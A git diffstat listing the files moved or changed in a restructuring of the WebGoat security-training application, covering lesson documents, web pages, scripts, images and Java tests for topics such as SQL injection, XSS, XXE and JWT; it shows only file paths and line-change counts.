 .../documentation}/HtmlTampering_Intro.adoc   |    0
 .../HtmlTampering_Mitigation.adoc             |    0
 .../documentation}/HtmlTampering_Task.adoc    |    0
 .../html_tampering}/html/HtmlTampering.html   |    6 +-
 .../i18n/WebGoatLabels.properties             |    0
 .../html_tampering}/images/samsung.jpg        |  Bin
 .../documentation}/HttpBasics_content1.adoc   |    0
 .../documentation}/HttpBasics_content2.adoc   |    0
 .../documentation}/HttpBasics_plan.adoc       |    0
 .../lessons/http_basics}/html/HttpBasics.html |    8 +-
 .../i18n/WebGoatLabels.properties             |    0
 .../i18n/WebGoatLabels_de.properties          |    0
 .../i18n/WebGoatLabels_fr.properties          |    0
 .../i18n/WebGoatLabels_nl.properties          |    0
 .../i18n/WebGoatLabels_ru.properties          |    0
 .../documentation}/0overview.adoc             |    0
 .../http_proxies/documentation}/10burp.adoc   |    0
 .../documentation}/1proxysetupsteps.adoc      |    0
 .../documentation}/3browsersetup.adoc         |    0
 .../5configurefilterandbreakpoints.adoc       |    0
 .../documentation}/6assignment.adoc           |    0
 .../http_proxies/documentation}/7resend.adoc  |    0
 .../documentation}/8httpsproxy.adoc           |   54 +-
 .../http_proxies/documentation}/9manual.adoc  |    0
 .../http_proxies}/html/HttpProxies.html       |   18 +-
 .../i18n/WebGoatLabels.properties             |    0
 .../http_proxies}/images/breakpoint.png       |  Bin
 .../http_proxies}/images/breakpoint2.png      |  Bin
 .../http_proxies}/images/burpfilter.png       |  Bin
 .../http_proxies}/images/burpfilterclient.png |  Bin
 .../http_proxies}/images/burpintercept.png    |  Bin
 .../http_proxies}/images/burpintercepted.png  |  Bin
 .../http_proxies}/images/burpproxy.png        |  Bin
 .../lessons/http_proxies}/images/burpwarn.png |  Bin
 .../images/chrome-manual-proxy-win.png        |  Bin
 .../images/chrome-manual-proxy.png            |  Bin
 .../images/firefox-proxy-config.png           |  Bin
 .../images/firefoxsettingscerts.png           |  Bin
 .../http_proxies}/images/importcerts.png      |  Bin
 .../http_proxies}/images/loginscreen.png      |  Bin
 .../http_proxies}/images/newlocalhost.png     |  Bin
 .../images/proxy-intercept-button.png         |  Bin
 .../images/proxy-intercept-details.png        |  Bin
 .../lessons/http_proxies}/images/rootca.png   |  Bin
 .../http_proxies}/images/savecerts.png        |  Bin
 .../images/zap-browser-button.png             |  Bin
 .../http_proxies}/images/zap-exclude.png      |  Bin
 .../http_proxies}/images/zap-history.png      |  Bin
 .../http_proxies}/images/zap-start.png        |  Bin
 .../images/zap_edit_and_resend.png            |  Bin
 .../images/zap_edit_and_response.png          |  Bin
 .../images/zap_edit_and_send.png              |  Bin
 .../http_proxies}/images/zap_exclude.png      |  Bin
 .../http_proxies}/images/zap_exclude_url.png  |  Bin
 .../documentation}/IDOR_editOtherProfile.adoc |    0
 .../documentation}/IDOR_editOwnProfile.adoc   |    0
 .../documentation}/IDOR_inputAltPath.adoc     |    0
 .../idor/documentation}/IDOR_intro.adoc       |    0
 .../idor/documentation}/IDOR_login.adoc       |    0
 .../idor/documentation}/IDOR_mitigation.adoc  |    0
 .../idor/documentation}/IDOR_viewDiffs.adoc   |    0
 .../documentation}/IDOR_viewOtherProfile.adoc |    0
 .../documentation}/IDOR_viewOwnAltPath.adoc   |    0
 .../idor/documentation}/IDOR_whatDiffs.adoc   |    0
 .../lessons/idor/documentation}/temp.txt      |    0
 .../resources/lessons/idor}/html/IDOR.html    |   18 +-
 .../idor}/i18n/WebGoatLabels.properties       |    0
 .../main/resources/lessons/idor}/js/idor.js   |    0
 .../documentation}/InsecureLogin_Intro.adoc   |    0
 .../documentation}/InsecureLogin_Task.adoc    |    0
 .../insecure_login}/html/InsecureLogin.html   |    4 +-
 .../i18n/WebGoatLabels.properties             |    0
 .../lessons/insecure_login}/js/credentials.js |    0
 .../main/resources/lessons/jwt}/css/jwt.css   |    0
 .../jwt}/db/migration/V2019_09_25_1__jwt.sql  |    0
 .../jwt/documentation}/JWT_decode.adoc        |    0
 .../lessons/jwt/documentation}/JWT_final.adoc |    0
 .../jwt/documentation}/JWT_libraries.adoc     |    0
 .../JWT_libraries_assignment.adoc             |    0
 .../JWT_libraries_assignment2.adoc            |    0
 .../JWT_libraries_solution.adoc               |    0
 .../documentation}/JWT_login_to_token.adoc    |    0
 .../jwt/documentation}/JWT_mitigation.adoc    |    0
 .../lessons/jwt/documentation}/JWT_plan.adoc  |    0
 .../jwt/documentation}/JWT_refresh.adoc       |    0
 .../JWT_refresh_assignment.adoc               |    0
 .../jwt/documentation}/JWT_signing.adoc       |    0
 .../documentation}/JWT_signing_solution.adoc  |    0
 .../jwt/documentation}/JWT_storing.adoc       |    0
 .../jwt/documentation}/JWT_structure.adoc     |    0
 .../lessons/jwt/documentation}/JWT_weak_keys  |    0
 .../main/resources/lessons/jwt}/html/JWT.html |   30 +-
 .../jwt}/i18n/WebGoatLabels.properties        |    0
 .../lessons/jwt/images/challenge1-small.png   |  Bin 0 -> 11722 bytes
 .../lessons/jwt/images/challenge2-small.png   |  Bin 0 -> 34371 bytes
 .../lessons/jwt/images/challenge3-small.png   |  Bin 0 -> 59108 bytes
 .../lessons/jwt/images/challenge4-small.png   |  Bin 0 -> 4433 bytes
 .../lessons/jwt/images/challenge5-small.png   |  Bin 0 -> 17065 bytes
 .../resources/lessons/jwt}/images/jerry.png   |  Bin
 .../lessons/jwt}/images/jwt_diagram.png       |  Bin
 .../lessons/jwt}/images/jwt_token.png         |  Bin
 .../resources/lessons/jwt}/images/logs.txt    |    0
 .../lessons/jwt}/images/product-icon.png      |  Bin
 .../resources/lessons/jwt}/images/tom.png     |  Bin
 .../main/resources/lessons/jwt}/js/jwt-buy.js |    0
 .../resources/lessons/jwt}/js/jwt-final.js    |    0
 .../resources/lessons/jwt}/js/jwt-refresh.js  |    0
 .../resources/lessons/jwt}/js/jwt-voting.js   |    0
 .../lessons/jwt}/js/jwt-weak-keys.js          |    0
 .../lessons/jwt}/js/questions_jwt.json        |    0
 .../migration/V2019_11_10_1__introduction.sql |    0
 .../lesson-template-attack.adoc               |   24 +-
 .../lesson-template-content.adoc              |   36 +
 .../lesson-template-database.adoc             |    6 +-
 .../documentation/lesson-template-glue.adoc   |   34 +
 .../documentation}/lesson-template-intro.adoc |    6 +-
 .../lesson-template-lesson-class.adoc         |    3 +-
 .../lesson-template-video-more.adoc           |    0
 .../documentation}/lesson-template-video.adoc |    4 +-
 .../lesson_template}/html/LessonTemplate.html |   16 +-
 .../i18n/WebGoatLabels.properties             |    0
 .../images/firefox-proxy-config.png           |  Bin
 .../lessons/lesson_template}/js/idor.js       |    0
 .../lesson_template}/video/sample-video.m4v   |  Bin
 .../documentation}/logReading_Task.adoc       |    0
 .../documentation}/logSpoofing_Task.adoc      |    0
 .../logging/documentation}/logging_intro.adoc |    0
 .../logging/documentation}/more_logging.adoc  |    0
 .../sensitive_logging_intro.adoc              |    0
 .../lessons/logging}/html/LogSpoofing.html    |   10 +-
 .../logging}/i18n/WebGoatLabels.properties    |    0
 .../resources/lessons/missing_ac}/css/ac.css  |    0
 .../db/migration/V2021_11_03_1__ac.sql        |    0
 .../missing-function-ac-01-intro.adoc         |    0
 ...issing-function-ac-02-client-controls.adoc |    0
 .../missing-function-ac-03-users.adoc         |    0
 .../missing-function-ac-04-users-fixed.adoc   |    0
 .../missing_ac}/html/MissingFunctionAC.html   |    8 +-
 .../missing_ac}/i18n/WebGoatLabels.properties |    0
 .../lessons/password_reset}/css/password.css  |    0
 .../PasswordReset_SecurityQuestions.adoc      |    0
 .../PasswordReset_host_header.adoc            |    0
 .../PasswordReset_known_questions.adoc        |    0
 .../PasswordReset_mitigation.adoc             |    0
 .../documentation}/PasswordReset_plan.adoc    |    0
 .../documentation}/PasswordReset_simple.adoc  |    0
 .../PasswordReset_wrong_message.adoc          |    0
 .../password_reset}/html/PasswordReset.html   |   16 +-
 .../i18n/WebGoatLabels.properties             |    0
 .../lessons/password_reset}/images/reset1.png |  Bin
 .../lessons/password_reset}/images/reset2.png |  Bin
 .../lessons/password_reset}/images/slack1.png |  Bin
 .../lessons/password_reset}/images/slack2.png |  Bin
 .../js/password-reset-simple.js               |    0
 .../templates/password_link_not_found.html    |    0
 .../templates/password_reset.html             |    0
 .../password_reset}/templates/success.html    |    0
 .../path_traversal}/css/path_traversal.css    |    0
 .../documentation}/PathTraversal_intro.adoc   |    0
 .../PathTraversal_retrieval.adoc              |    0
 .../documentation}/PathTraversal_upload.adoc  |    0
 .../PathTraversal_upload_fix.adoc             |    0
 .../PathTraversal_upload_fixed.adoc           |    0
 .../PathTraversal_upload_mitigation.adoc      |    0
 ...athTraversal_upload_remove_user_input.adoc |    0
 .../PathTraversal_zip_slip.adoc               |    0
 .../PathTraversal_zip_slip_assignment.adoc    |    0
 .../PathTraversal_zip_slip_solution.adoc      |    0
 .../path_traversal}/html/PathTraversal.html   |   18 +-
 .../i18n/WebGoatLabels.properties             |    0
 .../path_traversal}/images/account.png        |  Bin
 .../lessons/path_traversal}/images/cats/1.jpg |  Bin
 .../path_traversal}/images/cats/10.jpg        |  Bin
 .../lessons/path_traversal}/images/cats/2.jpg |  Bin
 .../lessons/path_traversal}/images/cats/3.jpg |  Bin
 .../lessons/path_traversal}/images/cats/4.jpg |  Bin
 .../lessons/path_traversal}/images/cats/5.jpg |  Bin
 .../lessons/path_traversal}/images/cats/6.jpg |  Bin
 .../lessons/path_traversal}/images/cats/7.jpg |  Bin
 .../lessons/path_traversal}/images/cats/8.jpg |  Bin
 .../lessons/path_traversal}/images/cats/9.jpg |  Bin
 .../path_traversal}/js/path_traversal.js      |    0
 .../documentation}/SecurePasswords_1.adoc     |    0
 .../documentation}/SecurePasswords_2.adoc     |    0
 .../documentation}/SecurePasswords_3.adoc     |    0
 .../documentation}/SecurePasswords_4.adoc     |    0
 ...curePasswords_assignment_introduction.adoc |    0
 .../documentation}/SecurePasswords_intro.adoc |    0
 .../html/SecurePasswords.html                 |   14 +-
 .../i18n/WebGoatLabels.properties             |    0
 .../i18n/WebGoatLabels_nl.properties          |    0
 .../secure_passwords}/js/questions_cia.json   |    0
 .../main/resources/lessons}/sol.MD            |    0
 .../main/resources/lessons}/sol.txt           |    0
 .../documentation}/SpoofCookie_content0.adoc  |    0
 .../documentation}/SpoofCookie_plan.adoc      |    0
 .../spoofcookie}/html/SpoofCookie.html        |    6 +-
 .../i18n/WebGoatLabels.properties             |    0
 .../lessons/spoofcookie}/js/handler.js        |    0
 .../en/SpoofCookie_solution.adoc              |    0
 .../lessonSolutions/html/SpoofCookie.html     |    0
 .../templates/spoofcookieform.html            |    0
 .../sql_injection}/css/assignments.css        |    0
 .../lessons/sql_injection}/css/challenge.css  |    0
 .../lessons/sql_injection}/css/quiz.css       |    0
 .../db/migration/V2019_09_26_1__servers.sql   |   12 +-
 .../db/migration/V2019_09_26_2__users.sql     |    0
 .../db/migration/V2019_09_26_3__salaries.sql  |    0
 .../db/migration/V2019_09_26_4__tan.sql       |    0
 .../V2019_09_26_5__challenge_assignment.sql   |    0
 .../V2019_09_26_6__user_system_data.sql       |    0
 .../db/migration/V2019_09_26_7__employees.sql |    0
 .../db/migration/V2021_03_13_8__grant.sql     |    0
 .../SqlInjectionAdvanced_plan.adoc            |    0
 .../SqlInjection_challenge.adoc               |    0
 .../SqlInjection_content10.adoc               |    2 +-
 .../SqlInjection_content11.adoc               |    0
 .../SqlInjection_content12.adoc               |    0
 .../SqlInjection_content12a.adoc              |    0
 .../SqlInjection_content12b.adoc              |    0
 .../SqlInjection_content13.adoc               |    0
 .../SqlInjection_content14.adoc               |    0
 .../documentation}/SqlInjection_content6.adoc |    0
 .../SqlInjection_content6a.adoc               |    0
 .../SqlInjection_content6c.adoc               |    0
 .../documentation}/SqlInjection_content7.adoc |    0
 .../documentation}/SqlInjection_content8.adoc |    0
 .../documentation}/SqlInjection_content9.adoc |    0
 .../SqlInjection_introduction_content1.adoc   |    0
 .../SqlInjection_introduction_content10.adoc  |    0
 .../SqlInjection_introduction_content11.adoc  |    0
 .../SqlInjection_introduction_content12.adoc  |    0
 .../SqlInjection_introduction_content2.adoc   |    0
 .../SqlInjection_introduction_content3.adoc   |    0
 .../SqlInjection_introduction_content4.adoc   |    0
 ...Injection_introduction_content5_after.adoc |    0
 ...njection_introduction_content5_before.adoc |    0
 .../SqlInjection_introduction_content6.adoc   |    0
 .../SqlInjection_introduction_content7.adoc   |    0
 .../SqlInjection_introduction_content8.adoc   |    0
 .../SqlInjection_introduction_content9.adoc   |    0
 .../SqlInjection_introduction_plan.adoc       |    0
 .../SqlInjection_jdbc_completion.adoc         |    0
 .../SqlInjection_jdbc_newcode.adoc            |    0
 .../documentation}/SqlInjection_order_by.adoc |    0
 .../documentation}/SqlInjection_quiz.adoc     |    0
 .../sql_injection}/html/SqlInjection.html     |   28 +-
 .../html/SqlInjectionAdvanced.html            |   12 +-
 .../html/SqlInjectionMitigations.html         |   26 +-
 .../i18n/WebGoatLabels.properties             |    0
 .../i18n/WebGoatLabels_de.properties          |    0
 .../i18n/WebGoatLabels_fr.properties          |    0
 .../i18n/WebGoatLabels_ru.properties          |    0
 .../sql_injection}/js/assignment10b.js        |    0
 .../lessons/sql_injection}/js/assignment13.js |    0
 .../lessons/sql_injection}/js/challenge.js    |    0
 .../js/questions_sql_injection.json           |    0
 .../ssrf/documentation}/SSRF_Intro.adoc       |    0
 .../ssrf/documentation}/SSRF_Prevent.adoc     |    0
 .../ssrf/documentation}/SSRF_Task1.adoc       |    0
 .../ssrf/documentation}/SSRF_Task2.adoc       |    0
 .../resources/lessons/ssrf}/html/SSRF.html    |    8 +-
 .../ssrf}/i18n/WebGoatLabels.properties       |    0
 .../resources/lessons/ssrf}/images/cat.jpg    |  Bin
 .../resources/lessons/ssrf}/images/jerry.png  |  Bin
 .../resources/lessons/ssrf}/images/tom.png    |  Bin
 .../resources/lessons/ssrf}/js/credentials.js |    0
 .../VulnerableComponents_content0.adoc        |    0
 .../VulnerableComponents_content1.adoc        |    0
 .../VulnerableComponents_content1a.adoc       |    0
 .../VulnerableComponents_content2.adoc        |    0
 .../VulnerableComponents_content2a.adoc       |    0
 .../VulnerableComponents_content3.adoc        |    0
 .../VulnerableComponents_content4.adoc        |    0
 .../VulnerableComponents_content4a.adoc       |    0
 .../VulnerableComponents_content4b.adoc       |    0
 .../VulnerableComponents_content4c.adoc       |    0
 .../VulnerableComponents_content5.adoc        |    0
 .../VulnerableComponents_content5a.adoc       |    0
 .../VulnerableComponents_content6.adoc        |    0
 .../VulnerableComponents_plan.adoc            |    0
 .../html/VulnerableComponents.html            |   30 +-
 .../i18n/WebGoatLabels.properties             |    0
 .../images/OWASP-2013-A9.png                  |  Bin
 .../images/OWASP-Dep-Check.png                |  Bin
 .../images/Old-Components.png                 |  Bin
 .../images/OpenSourceGrowing.png              |  Bin
 .../images/Risk-of-Old-Components.png         |  Bin
 .../images/WebGoat-Vulns.png                  |  Bin
 .../documentation}/Introduction.adoc          |    0
 .../html/WebGoatIntroduction.html             |    8 +
 .../i18n/WebGoatLabels.properties             |    0
 .../webgoat_introduction}/images/wg_logo.png  |  Bin
 .../documentation}/IntroductionWebWolf.adoc   |    0
 .../documentation}/Landing_page.adoc          |    0
 .../documentation}/Receiving_mail.adoc        |    0
 .../documentation}/Uploading_files.adoc       |    0
 .../html/WebWolfIntroduction.html             |    8 +-
 .../i18n/WebGoatLabels.properties             |    0
 .../webwolf_introduction}/images/files.png    |  Bin
 .../webwolf_introduction}/images/mailbox.png  |  Bin
 .../webwolf_introduction}/images/requests.png |  Bin
 .../images/wolf-enabled.png                   |  Bin
 .../templates/webwolfPasswordReset.html       |    0
 .../resources/lessons/xss}/css/stored-xss.css |    0
 .../CrossSiteScriptingMitigation_plan.adoc    |    0
 .../CrossSiteScriptingStored_plan.adoc        |    0
 .../CrossSiteScripting_content1.adoc          |    0
 .../CrossSiteScripting_content2.adoc          |    0
 .../CrossSiteScripting_content3.adoc          |    0
 .../CrossSiteScripting_content4.adoc          |    0
 .../CrossSiteScripting_content5.adoc          |    0
 .../CrossSiteScripting_content5a.adoc         |    0
 .../CrossSiteScripting_content5b.adoc         |    0
 .../CrossSiteScripting_content6.adoc          |    0
 .../CrossSiteScripting_content6a.adoc         |    0
 .../CrossSiteScripting_content6b.adoc         |    0
 .../CrossSiteScripting_content7-off.adoc      |    0
 .../CrossSiteScripting_content7.adoc          |    0
 .../CrossSiteScripting_content7b.adoc         |    0
 .../CrossSiteScripting_content7c.adoc         |    0
 .../CrossSiteScripting_content8.adoc          |    0
 .../CrossSiteScripting_content8a.adoc         |    0
 .../CrossSiteScripting_content8b.adoc         |    0
 .../CrossSiteScripting_content8c.adoc         |    0
 .../CrossSiteScripting_content9.adoc          |    0
 .../CrossSiteScripting_plan.adoc              |    0
 .../CrossSiteScripting_quiz.adoc              |    0
 .../lessons/xss}/html/CrossSiteScripting.html |   26 +-
 .../html/CrossSiteScriptingMitigation.html    |   14 +-
 .../xss}/html/CrossSiteScriptingStored.html   |   10 +-
 .../xss}/i18n/WebGoatLabels.properties        |    0
 .../xss}/i18n/WebGoatLabels_de.properties     |    0
 .../xss}/i18n/WebGoatLabels_fr.properties     |    0
 .../xss}/i18n/WebGoatLabels_ru.properties     |    0
 .../lessons/xss}/images/Reflected-XSS.png     |  Bin
 .../lessons/xss}/images/Stored-XSS.png        |  Bin
 .../resources/lessons/xss}/images/avatar1.png |  Bin
 .../resources/lessons/xss}/js/assignment3.js  |    0
 .../resources/lessons/xss}/js/assignment4.js  |    0
 .../js/questions_cross_site_scripting.json    |    0
 .../resources/lessons/xss}/js/stored-xss.js   |    0
 .../main/resources/lessons/xxe}/css/xxe.css   |    0
 .../resources/lessons/xxe}/csv/flights.txt    |    0
 .../lessons/xxe/documentation}/XXE_blind.adoc |    0
 .../documentation}/XXE_blind_assignment.adoc  |    4 +-
 .../XXE_changing_content_type.adoc            |    0
 .../XXE_changing_content_type_solution.adoc   |    0
 .../lessons/xxe/documentation}/XXE_code.adoc  |    0
 .../lessons/xxe/documentation}/XXE_intro.adoc |    0
 .../xxe/documentation}/XXE_mitigation.adoc    |    0
 .../xxe/documentation}/XXE_overflow.adoc      |    0
 .../lessons/xxe/documentation}/XXE_plan.adoc  |    0
 .../xxe/documentation}/XXE_simple.adoc        |    0
 .../XXE_simple_introduction.adoc              |    0
 .../documentation}/XXE_simple_solution.adoc   |    0
 .../XXE_static_code_analysis.adoc             |    0
 .../lessons/xxe/documentation}/temp.txt       |    0
 .../main/resources/lessons/xxe}/html/XXE.html |   26 +-
 .../xxe}/i18n/WebGoatLabels.properties        |    0
 .../resources/lessons/xxe}/images/avatar1.png |  Bin
 .../resources/lessons/xxe}/images/cat.jpg     |  Bin
 .../lessons/xxe}/images/etc_password.png      |  Bin
 .../resources/lessons/xxe}/images/example.dtd |    0
 .../lessons/xxe}/images/sonar-issue-xxe.png   |  Bin
 .../lessons/xxe}/images/sonar-issues.png      |  Bin
 .../lessons/xxe}/images/wolf-enabled.png      |  Bin
 .../lessons/xxe}/images/xxe-parser-java.png   |  Bin
 .../lessons/xxe}/images/xxe-parser.png        |  Bin
 .../lessons/xxe}/images/xxe-suggested-fix.png |  Bin
 .../main/resources/lessons/xxe}/js/xxe.js     |    0
 .../main/resources/lessons/xxe}/secret.txt    |    0
 .../resources/webgoat}/static/css/animate.css |    0
 .../static/css/asciidoctor-default.css        |    0
 .../resources/webgoat}/static/css/coderay.css |    0
 .../webgoat}/static/css/font-awesome.min.css  |    0
 .../webgoat}/static/css/img/appseceu-17.png   |  Bin
 .../webgoat}/static/css/img/favicon.ico       |  Bin
 .../webgoat}/static/css/img/logo.png          |  Bin
 .../webgoat}/static/css/img/logoBG.jpg        |  Bin
 .../webgoat}/static/css/img/owasp_logo.jpg    |  Bin
 .../webgoat}/static/css/img/solution.svg      |    0
 .../webgoat}/static/css/img/webBg.png         |  Bin
 .../webgoat/static/css/img}/wolf.svg          |    0
 .../resources/webgoat}/static/css/layers.css  |    0
 .../resources/webgoat}/static/css/main.css    |    0
 .../resources/webgoat}/static/css/menu.css    |    0
 .../resources/webgoat/static}/css/quiz.css    |    0
 .../resources/webgoat}/static/css/webgoat.css |    0
 .../webgoat}/static/fonts/FontAwesome.otf     |  Bin
 .../static/fonts/fontawesome-webfont.eot      |  Bin
 .../static/fonts/fontawesome-webfont.svg      |    0
 .../static/fonts/fontawesome-webfont.ttf      |  Bin
 .../static/fonts/fontawesome-webfont.woff     |  Bin
 .../webgoat}/static/js/application.js         |    0
 .../js/goatApp/controller/LessonController.js |    0
 .../js/goatApp/controller/MenuController.js   |    0
 .../webgoat}/static/js/goatApp/goatApp.js     |    0
 .../js/goatApp/model/AssignmentStatusModel.js |    0
 .../static/js/goatApp/model/FlagModel.js      |    0
 .../js/goatApp/model/FlagsCollection.js       |    0
 .../js/goatApp/model/HTMLContentModel.js      |    0
 .../static/js/goatApp/model/HintCollection.js |    0
 .../static/js/goatApp/model/HintModel.js      |    0
 .../js/goatApp/model/LabelDebugModel.js       |    0
 .../js/goatApp/model/LessonContentModel.js    |    0
 .../js/goatApp/model/LessonInfoModel.js       |    0
 .../goatApp/model/LessonOverviewCollection.js |    0
 .../static/js/goatApp/model/MenuCollection.js |    0
 .../static/js/goatApp/model/MenuData.js       |    0
 .../static/js/goatApp/model/MenuModel.js      |    0
 .../js/goatApp/model/ReportCardModel.js       |    0
 .../static/js/goatApp/scoreboardApp.js        |    0
 .../static/js/goatApp/support/CustomGoat.js   |    0
 .../static/js/goatApp/support/GoatUtils.js    |    0
 .../goatApp/support/goatAsyncErrorHandler.js  |    0
 .../js/goatApp/support/goatConstants.js       |    0
 .../js/goatApp/templates/lesson_overview.html |    0
 .../js/goatApp/templates/paging_controls.html |    0
 .../js/goatApp/templates/report_card.html     |    0
 .../js/goatApp/templates/scoreboard.html      |    0
 .../js/goatApp/view/ErrorNotificationView.js  |    0
 .../static/js/goatApp/view/GoatRouter.js      |    0
 .../js/goatApp/view/HelpControlsView.js       |    0
 .../static/js/goatApp/view/HintView.js        |    0
 .../js/goatApp/view/LessonContentView.js      |    0
 .../static/js/goatApp/view/MenuButtonView.js  |    0
 .../static/js/goatApp/view/MenuItemView.js    |    0
 .../static/js/goatApp/view/MenuView.js        |    0
 .../js/goatApp/view/PaginationControlView.js  |    0
 .../static/js/goatApp/view/ReportCardView.js  |    0
 .../static/js/goatApp/view/ScoreboardView.js  |    0
 .../static/js/goatApp/view/TitleView.js       |    0
 .../static/js/goatApp/view/UserAndInfoView.js |    0
 .../static/js/jquery/jquery-1.10.2.min.js     |    0
 .../js/jquery/jquery-ui-1.10.4.custom.min.js  |    0
 .../static/js/jquery_form/jquery.form.js      |    0
 .../resources/webgoat}/static/js/libs/ace.js  |    0
 .../webgoat}/static/js/libs/backbone-min.js   |    0
 .../webgoat}/static/js/libs/bootstrap.min.js  |    0
 .../static/js/libs/jquery-2.1.4.min.js        |    0
 .../webgoat}/static/js/libs/jquery-base.js    |    0
 .../static/js/libs/jquery-ui-1.10.4.js        |    0
 .../webgoat}/static/js/libs/jquery-ui.min.js  |    0
 .../webgoat}/static/js/libs/jquery-vuln.js    |    0
 .../webgoat}/static/js/libs/jquery.form.js    |    0
 .../webgoat}/static/js/libs/jquery.min.js     |    0
 .../webgoat}/static/js/libs/mode-java.js      |    0
 .../webgoat}/static/js/libs/polyglot.min.js   |    0
 .../webgoat}/static/js/libs/require.min.js    |    0
 .../resources/webgoat}/static/js/libs/text.js |    0
 .../webgoat}/static/js/libs/theme-monokai.js  |    0
 .../webgoat}/static/js/libs/underscore-min.js |    0
 .../main/resources/webgoat}/static/js/main.js |    0
 .../webgoat}/static/js/modernizr.min.js       |    0
 .../main/resources/webgoat}/static/js/quiz.js |    0
 .../webgoat}/static/js/scoreboard.js          |    0
 .../resources/webgoat}/static/js/toggle.js    |    0
 .../plugins/bootstrap-slider/css/slider.css   |    0
 .../bootstrap-slider/js/bootstrap-slider.js   |    0
 .../css/bootstrap-wysihtml5.css               |    0
 .../css/bootstrap3-wysiwyg5-color.css         |    0
 .../js/bootstrap3-wysihtml5.js                |    0
 .../bootstrap-wysihtml5/js/wysihtml5-0.3.0.js |    0
 .../plugins/bootstrap/css/bootstrap.min.css   |    0
 .../fonts/glyphicons-halflings-regular.eot    |  Bin
 .../fonts/glyphicons-halflings-regular.svg    |    0
 .../fonts/glyphicons-halflings-regular.ttf    |  Bin
 .../fonts/glyphicons-halflings-regular.woff   |  Bin
 .../nanoScroller/jquery.nanoscroller.min.js   |    0
 .../resources/webgoat}/templates/about.html   |    0
 .../webgoat}/templates/lesson_content.html    |    4 +-
 .../resources/webgoat}/templates/login.html   |    0
 .../webgoat}/templates/main_new.html          |    6 +
 .../webgoat}/templates/registration.html      |    0
 .../webgoat}/templates/scoreboard.html        |    0
 .../webwolf/static/css/img/webwolf.ico        |  Bin
 .../resources/webwolf/static/css/webwolf.css  |    0
 .../resources/webwolf}/static/images/wolf.png |  Bin
 .../resources/webwolf/static/images/wolf.svg  |   80 +
 .../webwolf}/static/js/fileUpload.js          |    6 +-
 .../main/resources/webwolf}/static/js/jwt.js  |    0
 .../main/resources/webwolf}/static/js/mail.js |    0
 .../resources/webwolf}/templates/error.html   |    0
 .../resources/webwolf}/templates/files.html   |    6 +-
 .../webwolf}/templates/fragments/footer.html  |    0
 .../webwolf}/templates/fragments/header.html  |   23 +-
 .../resources/webwolf}/templates/home.html    |    3 +-
 .../resources/webwolf}/templates/jwt.html     |    0
 .../resources/webwolf}/templates/mailbox.html |    0
 .../webwolf}/templates/registration.html      |    0
 .../webwolf}/templates/requests.html          |    0
 .../webwolf/templates/webwolf-login.html      |    0
 .../webgoat/container/WebGoatApplication.java |   10 +
 .../assignments/AssignmentEndpointTest.java   |   23 +-
 .../container}/plugins/LessonTest.java        |   31 +-
 .../container}/service/HintServiceTest.java   |   12 +-
 .../service/LessonMenuServiceTest.java        |   20 +-
 .../service/LessonProgressServiceTest.java    |   17 +-
 .../service/ReportCardServiceTest.java        |   16 +-
 .../container}/session/LabelDebuggerTest.java |    2 +-
 .../container}/session/LessonTrackerTest.java |    8 +-
 .../container}/users/UserRepositoryTest.java  |    8 +-
 .../container}/users/UserServiceTest.java     |   10 +-
 .../users/UserTrackerRepositoryTest.java      |   12 +-
 .../container}/users/UserValidatorTest.java   |    4 +-
 .../auth_bypass/BypassVerificationTest.java   |   19 +-
 ...assRestrictionsFrontendValidationTest.java |   15 +-
 .../lessons}/challenges/Assignment1Test.java  |   12 +-
 .../chrome_dev_tools/ChromeDevToolsTest.java  |   12 +-
 .../webgoat/lessons}/cia/CIAQuizTest.java     |   15 +-
 .../ClientSideFilteringAssignmentTest.java    |   15 +-
 ...ClientSideFilteringFreeAssignmentTest.java |   13 +-
 .../ShopEndpointTest.java                     |   12 +-
 .../lessons/cryptography}/CryptoUtilTest.java |    4 +-
 .../lessons}/csrf/CSRFFeedbackTest.java       |   13 +-
 .../deserialization/DeserializeTest.java      |   12 +-
 .../HijackSessionAssignmentTest.java          |   34 +-
 ...jackSessionAuthenticationProviderTest.java |    6 +-
 .../HttpBasicsInterceptRequestTest.java       |   17 +-
 .../lessons}/jwt/JWTDecodeEndpointTest.java   |   13 +-
 .../lessons}/jwt/JWTFinalEndpointTest.java    |   17 +-
 .../lessons}/jwt/JWTRefreshEndpointTest.java  |   15 +-
 .../jwt/JWTSecretKeyEndpointTest.java         |   15 +-
 .../lessons}/jwt/JWTVotesEndpointTest.java    |   15 +-
 .../owasp/webgoat/lessons}/jwt/TokenTest.java |    2 +-
 .../lessons}/missing_ac/DisplayUserTest.java  |    6 +-
 .../MissingFunctionACHiddenMenusTest.java     |   10 +-
 .../MissingFunctionACUsersTest.java           |   16 +-
 .../MissingFunctionACYourHashAdminTest.java   |   16 +-
 .../MissingFunctionYourHashTest.java          |   11 +-
 .../SecurityQuestionAssignmentTest.java       |   22 +-
 .../path_traversal/ProfileUploadFixTest.java  |   13 +-
 .../ProfileUploadRemoveUserInputTest.java     |   13 +-
 .../ProfileUploadRetrievalTest.java           |   13 +-
 .../path_traversal/ProfileUploadTest.java     |   13 +-
 .../SpoofCookieAssignmentTest.java            |   27 +-
 .../spoofcookie/encoders/EncDecTest.java      |    3 +-
 .../lessons}/sql_injection/SqlLessonTest.java |   11 +-
 .../SqlInjectionLesson10Test.java             |    7 +-
 .../introduction/SqlInjectionLesson2Test.java |    7 +-
 .../introduction/SqlInjectionLesson5Test.java |    9 +-
 .../SqlInjectionLesson5aTest.java             |    7 +-
 .../SqlInjectionLesson6aTest.java             |   11 +-
 .../SqlInjectionLesson6bTest.java             |   11 +-
 .../introduction/SqlInjectionLesson8Test.java |    7 +-
 .../introduction/SqlInjectionLesson9Test.java |    7 +-
 .../mitigation/SqlInjectionLesson13Test.java  |    7 +-
 .../SqlOnlyInputValidationOnKeywordsTest.java |    7 +-
 .../SqlOnlyInputValidationTest.java           |    7 +-
 .../webgoat/lessons}/ssrf/SSRFTest1.java      |   10 +-
 .../webgoat/lessons}/ssrf/SSRFTest2.java      |   10 +-
 .../VulnerableComponentsLessonTest.java       |    6 +-
 .../xss/CrossSiteScriptingLesson1Test.java    |   12 +-
 .../xss/DOMCrossSiteScriptingTest.java        |    7 +-
 .../lessons}/xss/StoredXssCommentsTest.java   |    6 +-
 .../xxe/BlindSendFileAssignmentTest.java      |   88 +-
 .../xxe/ContentTypeAssignmentTest.java        |   43 +-
 .../webgoat/lessons}/xxe/SimpleXXETest.java   |   11 +-
 .../webgoat/webwolf/WebWolfApplication.java   |   10 +
 .../webgoat}/webwolf/jwt/JWTTokenTest.java    |    4 +-
 .../mailbox/MailboxControllerTest.java        |   50 +-
 .../mailbox/MailboxRepositoryTest.java        |   18 +-
